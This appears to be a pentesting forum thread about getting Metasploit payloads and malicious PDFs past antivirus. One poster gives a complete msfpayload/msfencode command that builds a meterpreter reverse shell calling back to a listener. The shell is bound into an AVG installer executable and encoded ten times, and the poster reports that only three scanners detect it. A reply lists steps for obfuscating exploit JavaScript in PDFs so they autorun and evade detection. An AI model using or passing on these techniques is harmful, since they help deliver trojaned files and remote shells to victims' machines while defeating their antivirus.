msf encode av bypass works

[pentest09]

Hi all,

I just got a nice payload working bypassing most AV's according to virus total only 3 picked up.

and it works on win 7 but it isnt really client side so i need to work out how to create a SET adobe util , like the one below manually: ie: pdf to exe type

#msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.75 LPORT=9090 R | msfencode -x avg_free_stb_all_9_114_cnet.exe -t exe -e x86/shikata_ga_nai -c 10 -o avg.exe

Is there a way to encode a pdf adobe util etc with same coding 10x x86/shikata_ga_na like the SET payloads or a way to specify this type using set with 10x encoding?

[lupin]

There is a way to encode pdf files to bypass AV, yes, but you cant do it with msfencode because that is used to encode shellcode (payloads essentially), not entire exploits. Encoding of particular file types requires file type specific methods.

I actually encoded a pdf file to bypass antivirus last week and was planning to write a blog entry about how, so I will post a link to that here when its done.

If you're impatient, here is the basic process, which can be used for pdf exploits that use Javascript code to trigger the exploit (and that applies to the majority of current pdf sploits):

1. Obtain the base JavaScript used to perform the exploit. This can be extracted from existing exploits if you know how.
2. Obfuscate the JavaScript code for the exploit. Use your imagination here, and do a good job at it because this is the step that will provide the maximum benefit in terms of AV avoidance. You need workable Javascript knowledge for this.
3. Use make-pdf tools from Didier Stevens to create a PDF that auto runs the script
4. Compress the PDF using pdftk

[pentest09]

Thanks lupin for the reply look forward to your blog post, its been very hard to try pentests in lab as my boxes all have eset smart security and it does its job well but just managed to bypass it with the msfencode i posted, on win 7 machine through nat .

[lupin]

As mentioned earlier, I finally got around to writing a blog post about bypassing AV detection for malicious PDF files. Its here:

The Grey Corner: Bypassing AntiVirus Detection for Malicious PDFs